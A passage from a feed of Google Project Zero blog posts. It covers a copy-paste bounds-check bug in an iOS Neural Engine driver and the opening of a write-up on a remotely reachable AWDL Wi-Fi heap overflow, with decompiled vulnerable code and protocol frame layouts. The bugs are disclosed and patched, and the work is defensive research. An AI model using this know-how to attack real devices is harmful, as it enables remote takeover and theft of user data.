I discovered several interesting things in the process of reversing. First, H11ANEIn appeared to actually have 2 user clients: H11ANEInDirectPathClient (the one I had opened) and H11ANEInUserClient (which I could not open in the sandbox). Reading the strings in the method H11ANEIn::newUserClient(), it appeared that H11ANEInDirectPathClient is the less privileged version of H11ANEInUserClient, so it made sense that I could open the former but not the latter.


if ( type == 1 ) // H11ANEInDirectPathClient

{

    _os_log_internal(...,

        "%s : ... : Creating direct evaluate client\n",

        "virtual IOReturn H11ANEIn::newUserClient(...)");

    ...

}

else // H11ANEInUserClient

{

    _os_log_internal(...,

        "%s : ... : Creating default full-entitlement client\n",

        "virtual IOReturn H11ANEIn::newUserClient(...)");

    ...

}


The traditional starting point when looking for bugs in IOKit user clients is to look at the external methods that are provided. These are usually identifiable as tables of function pointers near the user client's vtable in the kernelcache image. Here are the external method tables I identified for the two user clients, curiously laid out back-to-back in the kernelcache rather than each near their respective vtable:



Also, I noticed something interesting when I looked at the cross-references to these two tables: it seemed like since the classes were basically identical except for one being a less-privileged version of the other, Apple had made the rather unusual decision to share the parts of the external method tables corresponding to shared functionality between the two user client types!


This was evident from how the ::externalMethod() methods of each user client accessed the overlapping parts of the external method tables. The H11ANEInDirectPathClient version:


int H11ANEInDirectPathClient::externalMethod(H11ANEInDirectPathClient *this, u32 selector, IOExternalMethodArguments *args, IOExternalMethodDispatch *method, void *target)

{

    if ( !target )

        target = this;

    if ( selector <= 33 )

        method = &H11ANEInDirectPathClient_ExternalMethods_34[selector];

    return IOUserClient::externalMethod(this, selector, args, method, target);

}


And the H11ANEInUserClient version:


int H11ANEInUserClient::externalMethod(H11ANEInUserClient *this, u32 selector, IOExternalMethodArguments *args, IOExternalMethodDispatch *method, void *target)

{

    if ( !target )

        target = this;

    if ( selector <= 33 )

        method = &H11ANEInUserClient_ExternalMethods_34[selector];

    return IOUserClient::externalMethod(this, selector, args, method, target);

}


Since each can access 34 methods and the first 3 in the array are reserved for H11ANEInDirectPathClient, this meant that the last 3 would be reserved for H11ANEInUserClient, which seemed to check out since there were 37 methods total. Neat.


So, I started digging into the methods accessible by H11ANEInDirectPathClient, and very quickly adopted the opinion that the code quality in this driver was not very high. For example, I found that the 3500-line method H11ANEIn::ANE_ProgramSendRequest_gated(), reachable through selectors 2 and 33, exhibited some pretty trivial out-of-bounds reads right at the top of the function:



Here, the content of args is fully controlled, so the args->totInputBuffers count can be arbitrarily high, past the ends of the inputBufferSymbolIndex and inputBufferSurfaceId arrays.


Since the code quality seemed to be low, and since I was not particularly keen on untangling multi-thousand-line functions, I also tried to perform some very trivial fuzzing. My fuzzing experience was quite limited, but I had long ago written a dumb fuzzer that just blindly calls IOConnectCallMethod() from userspace passing randomly generated values; surprisingly, this had been sufficient before to find real kernel vulnerabilities. So, I decided to revive that old fuzzer and point it at H11ANEInDirectPathClient.


Within one second of launching the fuzzer app, the device panicked.


I was of course quite excited at this development, but it turned out that the bug was a pretty trivial NULL pointer dereference; not exploitable on iOS. And further fuzzing didn't seem to trigger anything else interesting. So, with other more interesting projects mounting, I sent a quick non-security report to Apple alerting that this area of the code could be problematic and then turned away from H11ANEInDirectPathClient.

Once more, with symbols

Fast forward to the end of August.


As had happened before with the iOS 12 beta, Apple had accidentally included a symbolicated kernelcache in some of the iOS 14 beta releases. I hadn't had a chance to dig into them yet, but I figured that the addition of symbols (and in particular the limited type information that could be inferred from mangled C++ method names) would make reversing the web of multi-thousand-line H11ANEIn functions faster and thus more worthwhile. So, I opened IDA and jumped once again to the external method tables to see if there were any obvious changes.


But almost immediately, something about the external method tables caught my eye:



Oddly, the external method tables for both H11ANEInDirectPathClient and H11ANEInUserClient had defined symbols. This was weird: I had expected the code would consist of a single array of IOExternalMethodDispatch structs, so that H11ANEInDirectPathClient could claim the 34 methods starting at index 0 while H11ANEInUserClient could claim the 34 methods starting at index 3. In such an arrangement, there should only be one symbol, that for the array as a whole.


Then it dawned on me: my notion of overlapping external method arrays was nonsense, and the "sharing" of external methods was a simple out-of-bounds access by H11ANEInDirectPathClient! The less privileged client was supposed to only have 3 methods, but it just so happened that there was a typo in the bounds-check, allowing H11ANEInDirectPathClient to access and call external methods from the more privileged client. And in so doing, each call by H11ANEInDirectPathClient to an H11ANEInUserClient was implicitly triggering a type confusion on the this pointer!


In hindsight, I realized that the "sharing external method arrays" arrangement made no sense: any such use would have to be careful to avoid type confusion between the two classes of user clients, and no such precaution was taking place. This conviction was confirmed when I decompiled H11ANEInDirectPathClient::externalMethod() in the new kernelcache and saw that the bounds check on the selector had decreased from 33 to 2, meaning the bug was now patched.


So, I had missed an issue staring me in the face the whole time, whose existence I had justified by inventing a concept of overlapping method tables. And of course, to add insult to injury, the NULL pointer dereferences I had reported as a non-security issue were only reached by calling two of the out-of-bounds methods.

Another recipe for copypasta

How might this bug have come to exist in the first place? Since the buggy version included the same bounds check for both ::externalMethod() implementations, I suspect this was another case of a copy-paste bug. Here's my guess for what H11ANEInUserClient::externalMethod() actually looks like in Apple's source:


IOReturn H11ANEInUserClient::externalMethod(

    u32 selector, IOExternalMethodArguments *args,

    IOExternalMethodDispatch *method, void *target)

{

    if ( !target )

        target = this;

    if ( selector < H11ANEInUserClient::sMethodCount )

        method = &H11ANEInUserClient::sMethods[selector];

    return super::externalMethod(this, selector, args, method, target);

}


My guess is that this code was copy-pasted to create the H11ANEInDirectPathClient version, but the author accidentally forgot to change the type name in the selector check:


IOReturn H11ANEInDirectPathClient::externalMethod(

    u32 selector, IOExternalMethodArguments *args,

    IOExternalMethodDispatch *method, void *target)

{

    if ( !target )

        target = this;

    if ( selector < H11ANEInUserClient::sMethodCount )

        method = &H11ANEInDirectPathClient::sMethods[selector];

    return super::externalMethod(this, selector, args, method, target);

}


Aside from that, it's mostly a convenient accident that the compiler laid the external method tables back-to-back, making this bug plausibly exploitable (as opposed to past cases of out-of-bounds external methods that I'm aware of). That said, I have not examined the actual exploitability of this issue.

Conclusion

So, what are the takeaways from this story?


First, it's really easy to miss bugs, even ones that you feel should have been obvious. I kicked myself for missing this, given the mental gymnastics I went through to justify why a code pattern like this could exist in the first place. If there's one lesson I've had to teach myself again and again, it's to be inherently suspicious of code and to never assume that it's doing what it does on purpose.


Second, copy-paste is a really quick way to create code, but it's also a quick way to create subtle bugs that, by their nature, are tricky to spot by glancing at the source code. It's easy to tell that 2 arrays are "overlapping" by looking in a disassembler, but it's harder to see that the wrong one of two very similar class names was used in copy-pasted code. While it doesn't solve the problem 100%, it can help to decompose copy-pasted code patterns into reusable helper functions.


Finally, even though I only realized that there was a bug when I looked at the symbolicated kernelcache, I don't want Apple to get the impression that releasing symbols is a security risk. Security researchers rejoice when Apple accidentally releases symbolicated kernelcaches or development libraries, but this is just because it saves time reversing, not because it makes things newly reversible. Any capable attacker will find bugs regardless of the presence or absence of symbols; all the lack of symbols does is keep the bug away from eyes (like mine) that might report it. Hence, withholding symbols is an incredibly weak protection, only deterring the lowest tiers of attackers and serving to make the bugs that have been found last longer.


✇Google Project Zero

An iOS zero-click radio proximity exploit odyssey

By: Tim

Posted by Ian Beer, Project Zero


NOTE: This specific issue was fixed before the launch of Privacy-Preserving Contact Tracing in iOS 13.5 in May 2020.


In this demo I remotely trigger an unauthenticated kernel memory corruption vulnerability which causes all iOS devices in radio-proximity to reboot, with no user interaction. Over the next 30'000 words I'll cover the entire process to go from this basic demo to successfully exploiting this vulnerability in order to run arbitrary code on any nearby iOS device and steal all the user data

Introduction

Quoting @halvarflake's Offensivecon keynote from February 2020:


"Exploits are the closest thing to "magic spells" we experience in the real world: Construct the right incantation, gain remote control over device."


For 6 months of 2020, while locked down in the corner of my bedroom surrounded by my lovely, screaming children, I've been working on a magic spell of my own. No, sadly not an incantation to convince the kids to sleep in until 9am every morning, but instead a wormable radio-proximity exploit which allows me to gain complete control over any iPhone in my vicinity. View all the photos, read all the email, copy all the private messages and monitor everything which happens on there in real-time. 


The takeaway from this project should not be: no one will spend six months of their life just to hack my phone, I'm fine.


Instead, it should be: one person, working alone in their bedroom, was able to build a capability which would allow them to seriously compromise iPhone users they'd come into close contact with.


Imagine the sense of power an attacker with such a capability must feel. As we all pour more and more of our souls into these devices, an attacker can gain a treasure trove of information on an unsuspecting target.


What's more, with directional antennas, higher transmission powers and sensitive receivers the range of such attacks can be considerable.


I have no evidence that these issues were exploited in the wild; I found them myself through manual reverse engineering. But we do know that exploit vendors seemed to take notice of these fixes. For example, take this tweet from Mark Dowd, the co-founder of Azimuth Security, an Australian "market-leading information security business":



This tweet from @mdowd on May 27th 2020 mentioned a double free in BSS reachable via AWDL


The vulnerability Mark is referencing here is one of the vulnerabilities I reported to Apple. You don't notice a fix like that without having a deep interest in this particular code.


This Vice article from 2018 gives a good overview of Azimuth and why they might be interested in such vulnerabilities. You might trust that Azimuth's judgement of their customers aligns with your personal and political beliefs, you might not, that's not the point. Unpatched vulnerabilities aren't like physical territory, occupied by only one side. Everyone can exploit an unpatched vulnerability and Mark Dowd wasn't the only person to start tweeting about vulnerabilities in AWDL.


This has been the longest solo exploitation project I've ever worked on, taking around half a year. But it's important to emphasize up front that the teams and companies supplying the global trade in cyberweapons like this one aren't typically just individuals working alone. They're well-resourced and focused teams of collaborating experts, each with their own specialization. They aren't starting with absolutely no clue how bluetooth or wifi work. They also potentially have access to information and hardware I simply don't have, like development devices, special cables, leaked source code, symbols files and so on.


Of course, an iPhone isn't designed to allow people to build capabilities like this. So what went so wrong that it was possible? Unfortunately, it's the same old story. A fairly trivial buffer overflow programming error in C++ code in the kernel parsing untrusted data, exposed to remote attackers.


In fact, this entire exploit uses just a single memory corruption vulnerability to compromise the flagship iPhone 11 Pro device. With just this one issue I was able to defeat all the mitigations in order to remotely gain native code execution and kernel memory read and write.


Relative to the size and complexity of these codebases of major tech companies, the sizes of the security teams dedicated to proactively auditing their product's source code to look for vulnerabilities are very small. Android and iOS are complete custom tech stacks. It's not just kernels and device drivers but dozens of attacker-reachable apps, hundreds of services and thousands of libraries running on devices with customized hardware and firmware.


Actually reading all the code, including every new line in addition to the decades of legacy code, is unrealistic, at least with the division of resources commonly seen in tech where the ratio of security engineers to developers might be 1:20, 1:40 or even higher.


To tackle this insurmountable challenge, security teams rightly place a heavy emphasis on design level review of new features. This is sensible: getting stuff right at the design phase can help limit the impact of the mistakes and bugs which will inevitably occur. For example, ensuring that a new hardware peripheral like a GPU can only ever access a restricted portion of physical memory helps constrain the worst-case outcome if the GPU is compromised by an attacker. The attacker is hopefully forced to find an additional vulnerability to "lengthen the exploit chain", having to use an ever-increasing number of vulnerabilities to hack a single device. Retrofitting constraints like this to already-shipping features would be much harder, if not impossible.


In addition to design-level reviews, security teams tackle the complexity of their products by attempting to constrain what an attacker might be able to do with a vulnerability. These are mitigations. They take many forms and can be general, like stack cookies or application specific, like Structure ID in JavaScriptCore. The guarantees which can be made by mitigations are generally weaker than those made by design-level features but the goal is similar: to "lengthen the exploit chain", hopefully forcing an attacker to find a new vulnerability and incur some cost.


The third approach widely used by defensive teams is fuzzing, which attempts to emulate an attacker's vulnerability finding process with brute force. Fuzzing is often misunderstood as an effective method to discover easy-to-find vulnerabilities or "low-hanging fruit". A more precise description would be that fuzzing is an effective method to discover easy-to-fuzz vulnerabilities. Plenty of vulnerabilities which a skilled vulnerability researcher would consider low-hanging fruit can require reaching a program point that no fuzzer today will be able to reach, no matter the compute resources used.


The problem for tech companies and certainly not unique to Apple, is that while design review, mitigations, and fuzzing are necessary for building secure codebases, they are far from sufficient.


Fuzzers cannot reason about code in the same way a skilled vulnerability researcher can. This means that without concerted manual effort, vulnerabilities with a relatively low cost-of-discovery remain fairly prevalent. A major focus of my work over the last few years had been attempting to highlight that the iOS codebase, just like any other major modern operating system, has a high vulnerability density. Not only that, but there's a high density of "good bugs", that is, vulnerabilities which enable the creation of powerful weird machines.


This notion of "good bugs" is something that offensive researchers understand intuitively but something which might be hard to grasp for those without an exploit development background. Thomas Dullien's weird machines paper provides the best introduction to the notion of weird machines and their applicability to exploitation. Given a sufficiently complex state machine operating on attacker-controlled input, a "good bug" allows the attacker-controlled input to instead become "code", with the "good bug" introducing a new, unexpected state transition into a new, unintended state machine. The art of exploitation then becomes the art of determining how one can use vulnerabilities to introduce sufficiently powerful new state transitions such that, as an end goal, the attacker-supplied input becomes code for a new, weird machine capable of arbitrary system interactions.


It's with this weird machine that mitigations will be defeated; even a mitigation without implementation flaws is usually no match for a sufficiently powerful weird machine. An attacker looking for vulnerabilities is looking specifically for weird machine primitives. Their auditing process is focused on a particular attack-surface and particular vulnerability classes. This stands in stark contrast to a product security team with responsibility for every possible attack surface and every vulnerability class.


As things stand now in November 2020, I believe it's still quite possible for a motivated attacker with just one vulnerability to build a sufficiently powerful weird machine to completely, remotely compromise top-of-the-range iPhones. In fact, the parts of that process which are hardest probably aren't those which you might expect, at least not without an appreciation for weird machines.


Vulnerability discovery remains a fairly linear function of time invested. Defeating mitigations remains a matter of building a sufficiently powerful weird machine. Concretely, Pointer Authentication Codes (PAC) meant I could no longer take the popular direct shortcut to a very powerful weird machine via trivial program counter control and ROP or JOP. Instead I built a remote arbitrary memory read and write primitive which in practise is just as powerful and something which the current implementation of PAC, which focuses almost exclusively on restricting control-flow, wasn't designed to mitigate.


Secure system design didn't save the day because of the inevitable tradeoffs involved in building shippable products. Should such a complex parser driving multiple, complex state machines really be running in kernel context against untrusted, remote input? Ideally, no, and this was almost certainly flagged during a design review. But there are tight timing constraints for this particular feature which means isolating the parser is non-trivial. It's certainly possible, but that would be a major engineering challenge far beyond the scope of the feature itself. At the end of the day, it's features which sell phones and this feature is undoubtedly very cool; I can completely understand the judgement call which was made to allow this design despite the risks.


But risk means there are consequences if things don't go as expected. When it comes to software vulnerabilities it can be hard to connect the dots between those risks which were accepted and the consequences. I don't know if I'm the only one who found these vulnerabilities, though I'm the first to tell Apple about them and work with Apple to fix them. Over the next 30'000 words I'll show you what I was able to do with a single vulnerability in this attack surface and hopefully give you a new or renewed insight into the power of the weird machine.


I don't think all hope is lost; there's just an awful lot more left to do. In the conclusion I'll try to share some ideas for what I think might be required to build a more secure iPhone.


If you want to follow along you can find details attached to issue 1982 in the Project Zero issue tracker.

Vulnerability discovery

In 2018 Apple shipped an iOS beta build without stripping function name symbols from the kernelcache. While this was almost certainly an error, events like this help researchers on the defending side enormously. One of the ways I like to procrastinate is to scroll through this enormous list of symbols, reading bits of assembly here and there. One day I was looking through IDA's cross-references to memmove with no particular target in mind when something jumped out as being worth a closer look:


IDA Pro's cross references window shows a large number of calls to memmove. A callsite in IO80211AWDLPeer::parseAwdlSyncTreeTLV is highlighted


Having function names provides a huge amount of missing context for the vulnerability researcher. A completely stripped 30+MB binary blob such as the iOS kernelcache can be overwhelming. There's a huge amount of work to determine how everything fits together. What bits of code are exposed to attackers? What sanity checking is happening and where? What execution context are different parts of the code running in?


In this case this particular driver is also available on MacOS, where function name symbols are not stripped.


There are three things which made this highlighted function stand out to me:


1) The function name:


IO80211AWDLPeer::parseAwdlSyncTreeTLV


At this point, I had no idea what AWDL was. But I did know that TLVs (Type, Length, Value) are often used to give structure to data, and parsing a TLV might mean it's coming from somewhere untrusted. And the 80211 is a giveaway that this probably has something to do with WiFi. Worth a closer look. Here's the raw decompilation from Hex-Rays which we'll clean up later:


__int64 __fastcall IO80211AWDLPeer::parseAwdlSyncTreeTLV(__int64 this, __int64 buf)

{

  const void *v3; // x20

  _DWORD *v4; // x21

  int v5; // w8

  unsigned __int16 v6; // w25

  unsigned __int64 some_u16; // x24

  int v8; // w21

  __int64 v9; // x8

  __int64 v10; // x9

  unsigned __int8 *v11; // x21

 

  v3 = (const void *)(buf + 3);

  v4 = (_DWORD *)(this + 1203);

  v5 = *(_DWORD *)(this + 1203);

  if ( ((v5 + 1) & 0xFFFFu) <= 0xA )

    v6 = v5 + 1;

  else

    v6 = 10;

  some_u16 = *(unsigned __int16 *)(buf + 1) / 6uLL;

  if ( (_DWORD)some_u16 == v6 )

  {

    some_u16 = v6;

  }

  else

  {

    IO80211Peer::logDebug(

      this,

      0x8000000000000uLL,

      "Peer %02X:%02X:%02X:%02X:%02X:%02X: PATH LENGTH error hc %u calc %u \n",

      *(unsigned __int8 *)(this + 32),

      *(unsigned __int8 *)(this + 33),

      *(unsigned __int8 *)(this + 34),

      *(unsigned __int8 *)(this + 35),

      *(unsigned __int8 *)(this + 36),

      *(unsigned __int8 *)(this + 37),

      v6,

      some_u16);

    *v4 = some_u16;

    v6 = some_u16;

  }

  v8 = memcmp((const void *)(this + 5520), v3, (unsigned int)(6 * some_u16));

  memmove((void *)(this + 5520), v3, (unsigned int)(6 * some_u16));


Definitely looks like it's parsing something. There's some fiddly byte manipulation; something which sort of looks like a bounds check and an error message.


2) The second thing which stands out is the error message string:


"Peer %02X:%02X:%02X:%02X:%02X:%02X: PATH LENGTH error hc %u calc %u\n" 


Any kind of LENGTH error sounds like fun to me. Especially when you look a little closer...


3) The control flow graph.


Reading the code a bit more closely it appears that although the log message contains the word "error" there's nothing which is being treated as an error condition here. IO80211Peer::logDebug isn't a fatal logging API, it just logs the message string. Tracing back the length value which is passed to memmove, regardless of which path is taken we still end up with what looks like an arbitrary u16 value from the input buffer (rounded down to the nearest multiple of 6) passed as the length argument to memmove.


Can it really be this easy? Typically, in my experience, bugs this shallow in real attack surfaces tend to not work out. There's usually a length check somewhere far away; you'll spend a few days trying to work out why you can't seem to reach the code with a bad size until you find it and realize this was a CVE from a decade ago. Still, worth a try.


But what even is this attack surface?

A first proof-of-concept

A bit of googling later we learn that awdl is a type of welsh poetry, and also an acronym for an Apple-proprietary mesh networking protocol probably called Apple Wireless Direct Link. It appears to be used by AirDrop amongst other things.


The first goal is to determine whether we can really trigger this vulnerability remotely.


We can see from the casts in the parseAwdlSyncTreeTLV method that the type-length-value objects have a single-byte type then a two-byte length followed by a payload value.


In IDA selecting the function name and going View -> Open subviews -> Cross references (or pressing 'x') shows IDA only found one caller of this method:


IO80211AWDLPeer::actionFrameReport

...

      case 0x14u:

        if (v109[20] >= 2)

          goto LABEL_126;

        ++v109[0x14];

        IO80211AWDLPeer::parseAwdlSyncTreeTLV(this, bytes);


So 0x14 is probably the type value, and v109 looks like it's probably counting the number of these TLVs.


Looking in the list of function names we can also see that there's a corresponding BuildSyncTreeTlv method. If we could get two machines to join an AWDL network, could we just use the MacOS kernel debugger to make the SyncTree TLV very large before it's sent?


Yes, you can. Using two MacOS laptops and enabling AirDrop on both of them I used a kernel debugger to edit the SyncTree TLV sent by one of the laptops, which caused the other one to kernel panic due to an out-of-bounds memmove.


If you're interested in exactly how to do that take a look at the original vulnerability report I sent to Apple on November 29th 2019. This vulnerability was fixed as CVE-2020-3843 on January 28th 2020 in iOS 13.1.1/MacOS 10.15.3.


Our journey is only just beginning. Getting from here to running an implant on an iPhone 11 Pro with no user interaction is going to take a while...

Prior Art

There are a series of papers from the Secure Mobile Networking Lab at TU Darmstadt in Germany (also known as SEEMOO) which look at AWDL. The researchers there have done a considerable amount of reverse engineering (in addition to having access to some leaked Broadcom source code) to produce these papers; they are invaluable to understand AWDL and pretty much the only resources out there. 


The first paper One Billion Apples’ Secret Sauce: Recipe for the Apple Wireless Direct Link Ad hoc Protocol covers the format of the frames used by AWDL and the operation of the channel-hopping mechanism.


The second paper A Billion Open Interfaces for Eve and Mallory: MitM, DoS, and Tracking Attacks on iOS and macOS Through Apple Wireless Direct Link focuses more on Airdrop, one of the OS features which uses AWDL. This paper also examines how Airdrop uses Bluetooth Low Energy advertisements to enable AWDL interfaces on other devices.


The research group wrote an open source AWDL client called OWL (Open Wireless Link). Although I was unable to get OWL to work it was nevertheless an invaluable reference and I did use some of their frame definitions.

What is AWDL?

AWDL is an Apple-proprietary mesh networking protocol designed to allow Apple devices like iPhones, iPads, Macs and Apple Watches to form ad-hoc peer-to-peer mesh networks. Chances are that if you own an Apple device you're creating or connecting to these transient mesh networks multiple times a day without even realizing it.


If you've ever used Airdrop, streamed music to your Homepod or Apple TV via Airplay or used your iPad as a secondary display with Sidecar then you've been using AWDL. And even if you haven't been using those features, if people nearby have been then it's quite possible your device joined the AWDL mesh network they were using anyway.


AWDL isn't a custom radio protocol; the radio layer is WiFi (specifically 802.11g and 802.11a). 


Most people's experience with WiFi involves connecting to an infrastructure network. At home you might plug a WiFi access point into your modem which creates a WiFi network. The access point broadcasts a network name and accepts clients on a particular channel.


To reach other devices on the internet you send WiFi frames to the access point (1). The access point sends them to the modem (2) and the modem sends them to your ISP (3,4) which sends them to the internet:



The topology of a typical home network


To reach other devices on your home WiFi network you send WiFi frames to the access point and the access point relays them to the other devices:


WiFi clients communicate via an access point, even if they are within WiFi range of each other


In reality the wireless signals don't propagate as straight lines between the client and access point but spread out in space such that the two client devices may be able to see the frames transmitted by each other to the access point.


If WiFi client devices can already send WiFi frames directly to each other, then why have the access point at all? Without the complexity of the access point you could certainly have much more magical experiences which "just work", requiring no physical setup.


There are various protocols for doing just this, each with their own tradeoffs. Tunneled Direct Link Setup (TDLS) allows two devices already on the same WiFi network to negotiate a direct connection to each other such that frames won't be relayed by the access point.


Wi-Fi Direct allows two devices not already on the same network to establish an encrypted peer-to-peer Wi-Fi network, using WPS to bootstrap a WPA2-encrypted ad-hoc network.


Apple's AWDL doesn't require peers to already be on the same network to establish a peer-to-peer connection, but unlike Wi-Fi Direct, AWDL has no built-in encryption. Unlike TDLS and Wi-Fi Direct, AWDL networks can contain more than two peers and they can also form a mesh network configuration where multiple hops are required.


AWDL has one more trick up its sleeve: an AWDL client can be connected to an AWDL mesh network and a regular AP-based infrastructure network at the same time, using only one Wi-Fi chipset and antenna. To see how that works we need to look a little more at some Wi-Fi fundamentals.



TDLS

Wi-Fi Direct

AWDL

Requires AP network

Yes

No

No

Encrypted

Yes

Yes

No

Peer Limit

2

2

Unlimited

Concurrent AP Connection Possible

No

No

Yes

WiFi fundamentals

There are over 20 years of WiFi standards spanning different frequency ranges of the electromagnetic spectrum, from as low as 54MHz in 802.11af up to over 60GHz in 802.11ad. Such networks are quite esoteric and consumer equipment uses frequencies near 2.4 Ghz or 5 Ghz. Ranges of frequencies are split into channels: for example in 802.11g channel 6 means a 22 Mhz range between 2.426 GHz and 2.448 GHz.


Newer 5 GHz standards like 802.11ac allow for wider channels up to 160 MHz; 5 Ghz channel numbers therefore encode both the center frequency and channel width. Channel 44 is a 20 MHz range between 5.210 Ghz and 5.230 Ghz whereas channel 46 is a 40 Mhz range which starts at the same lower frequency as channel 44 of 5.210 GHz but extends up to 5.250 GHz.


AWDL typically sends and receives frames on channel 6 and 44. How does that work if you're also using your home WiFi network on a different channel?

Channel Hopping and Time Division Multiplexing

In order to appear to be connected to two separate networks on separate frequencies at the same time, AWDL-capable devices split time into 16ms chunks and tell the WiFi controller chip to quickly switch between the channel for the infrastructure network and the channel being used by AWDL:



A typical AWDL channel hopping sequence, alternating between small periods on AWDL social channels and longer periods on the AP channel


The actual channel sequence is dynamic. Peers broadcast their channel sequences and adapt their own sequence to match peers with which they wish to communicate. The periods when an AWDL peer is listening on an AWDL channel are known as Availability Windows.


In this way the device can appear to be connected to the access point whilst also participating in the AWDL mesh at the same time. Of course, frames might be missed from both the AP and the AWDL mesh but the protocols are treating radio as an unreliable transport anyway so this only really has an impact on throughput. A large part of the AWDL protocol involves trying to synchronize the channel switching between peers to improve throughput.


The SEEMOO labs paper has a much more detailed look at the AWDL channel hopping mechanism.

AWDL frames

These are the first software-controlled fields which go over the air in a WiFi frame:


struct ieee80211_hdr {

  uint16_t frame_control;

  uint16_t duration_id;

  struct ether_addr dst_addr;

  struct ether_addr src_addr;

  struct ether_addr bssid_addr;

  uint16_t seq_ctrl;

} __attribute__((packed));


The first word contains fields which define the type of this frame. These are broadly split into three frame families: Management, Control and Data. The building blocks of AWDL use a subtype of Management frames called Action frames.


The address fields in an 802.11 header can have different meanings depending on the context; for our purposes the first is the destination device MAC address, the second is the source device MAC and the third is the MAC address of the infrastructure network access point or BSSID.


Since AWDL is a peer-to-peer network and doesn't use an access point, the BSSID field of an AWDL frame is set to the hard-coded AWDL BSSID MAC of 00:25:00:ff:94:73. It's this BSSID which AWDL clients are looking for when they're trying to find other peers. Your router won't accidentally use this BSSID because Apple owns the 00:25:00 OUI.


The format of the bytes following the header depends on the frame type. For an Action frame the next byte is a category field. There are a large number of categories which allow devices to exchange all kinds of information. For example category 5 covers various types of radio measurements like noise histograms.


The special category value 0x7f defines this frame as a vendor-specific action frame meaning that the next three bytes are the OUI of the vendor responsible for this custom action frame format.


Apple owns the OUI 0x00 0x17 0xf2 and this is the OUI used for AWDL action frames. Every byte in the frame after this is now proprietary, defined by Apple rather than an IEEE standard.


The SEEMOO labs team have done a great job reversing the AWDL action frame format and they developed a wireshark dissector.


AWDL Action frames have a fixed-sized header followed by a variable length collection of TLVs:



The layout of fields in an AWDL frame: 802.11 header, action frame header, AWDL fixed header and variable length AWDL payload


Each TLV has a single-byte type followed by a two-byte length which is the length of the variable-sized payload in bytes.


There are two types of AWDL action frame: Master Indication Frames (MIF) and Periodic Synchronization Frames (PSF). They differ only in their type field and the collection of TLVs they contain.


An AWDL mesh network has a single master node decided by an election process. Each node broadcasts a MIF containing a master metric parameter; the node with the highest metric becomes the master node. It is this master node's PSF timing values which should be adopted as the true timing values for all the other nodes to synchronize to; in this way their availability windows can overlap and the network can have a higher throughput.

Frame processing

Back in 2017, Project Zero researcher Gal Beniamini published a seminal 5-part blog post series entitled Over The Air where he exploited a vulnerability in the Broadcom WiFi chipset to gain native code execution on the WiFi controller, then pivoted via an iOS kernel bug in the chipset-to-Application Processor interface to achieve arbitrary kernel memory read/write.


In that case, Gal targeted a vulnerability in the Broadcom firmware when it was parsing data structures related to TDLS. The raw form of these data structures was handled by the chipset firmware itself and never made it to the application processor.


In contrast, for AWDL the frames appear to be parsed in their entirety on the Application Processor by the kernel driver. Whilst this means we can explore a lot of the AWDL code, it also means that we're going to have to build the entire exploit on top of primitives we can build with the AWDL parser, and those primitives will have to be powerful enough to remotely compromise the device. Apple continues to ship new mitigations with each iOS release and hardware revision, and we're of course going to target the latest iPhone 11 Pro with the largest collection of these mitigations in place.


Can we really build something powerful enough to remotely defeat kernel pointer authentication just with a linear heap overflow in a WiFi frame parser? Defeating mitigations usually involves building up a library of tricks to help build more and more powerful primitives. You might start with a linear heap overflow and use it to build an arbitrary read, then use that to help build an arbitrary bit flip primitive and so on.


I've built a library of tricks and techniques like this for doing local privilege escalations on iOS but I'll have to start again from scratch for this brand new attack surface.

A brief tour of the AWDL codebase

The first two C++ classes to familiarize ourselves with are IO80211AWDLPeer and IO80211AWDLPeerManager. There's one IO80211AWDLPeer object for each AWDL peer which a device has recently received a frame from. A background timer destroys inactive IO80211AWDLPeer objects. There's a single instance of the IO80211AWDLPeerManager which is responsible for orchestrating interactions between this device and other peers.


Note that although we have some function names from the iOS 12 beta 1 kernelcache and the MacOS IO80211Family driver we don't have object layout information. Brandon Azad pointed out that the MacOS prelinked kernel image does contain some structure layout information in the __CTF.__ctf section which can be parsed by the dtrace ctfdump tool. Unfortunately this seems to only contain structures from the open source XNU code.


The sizes of OSObject-based IOKit objects can easily be determined statically but the names and types of individual fields cannot. One of the most time-consuming tasks of this whole project was the painstaking process of reverse engineering the types and meanings of a huge number of the fields in these objects. Each IO80211AWDLPeer object is almost 6KB; that's a lot of potential fields. Having structure layout information would probably have saved months.


If you're a defender building a threat model don't interpret this the wrong way: I would assume any competent real-world exploit development team has this information; either from images or devices with full debug symbols they have acquired with or without Apple's consent, insider access, or even just from monitoring every single firmware image ever publicly released to check whether debug symbols were released by accident. Larger groups could even have people dedicated to building custom reversing tools.


Six years ago I had hoped Project Zero would be able to get legitimate access to data sources like this. Six years later and I am still spending months reversing structure layouts and naming variables.


We'll take IO80211AWDLPeerManager::actionFrameInput as the point where untrusted raw AWDL frame data starts being parsed. There is actually a separate, earlier processing layer in the WiFi chipset driver but its parsing is minimal.


Each frame received while the device is listening on a social channel which was sent to the AWDL BSSID ends up at actionFrameInput, wrapped in an mbuf structure. Mbufs are an anachronistic data structure used for wrapping collections of networking buffers. The mbuf API is the stuff of nightmares, but that's not in scope for this blogpost.


The mbuf buffers are concatenated to get a contiguous frame in memory for parsing, then IO80211PeerManager::findPeer is called, passing the source MAC address from the received frame:


IO80211AWDLPeer*

IO80211PeerManager::findPeer(struct ether_addr *peer_mac)


If an AWDL frame has recently been received from this source MAC then this function returns a pointer to an existing IO80211AWDLPeer structure representing the peer with that MAC. The IO80211AWDLPeerManager uses a fairly complicated priority queue data structure called IO80211CommandQueue to store pointers to these currently active peers.


If the peer isn't found in the IO80211AWDLPeerManager's queue of peers then a new IO80211AWDLPeer object is allocated to represent this new peer and it's inserted into the IO80211AWDLPeerManager's peers queue.


Once a suitable peer object has been found the IO80211AWDLPeerManager then calls the actionFrameReport method on the IO80211AWDLPeer so that it can handle the action frame.


This method is responsible for most of the AWDL action frame handling and contains most of the untrusted parsing. It first updates some timestamps then reads various fields from TLVs in the frame using the IO80211AWDLPeerManager::getTlvPtrForType method to extract them directly from the mbuf. After this initial parsing comes the main loop which takes each TLV in turn and parses it.


First each TLV is passed to IO80211AWDLPeer::tlvCheckBounds. This method has a hardcoded list of specific minimum and maximum TLV lengths for some of the supported TLV types. For types not explicitly listed it enforces a maximum length of 1024 bytes. I mentioned earlier that I often encounter code constructs which look like shallow memory corruption only to later discover a bounds check far away. This is exactly that kind of construct, and is in fact where Apple added a bounds check in the patch.


Type 0x14 (which has the vulnerability in the parser) isn't explicitly listed in tlvCheckBounds so it gets the default upper length limit of 1024, significantly larger than the 60 byte buffer allocated for the destination buffer in the IO80211AWDLPeer structure.


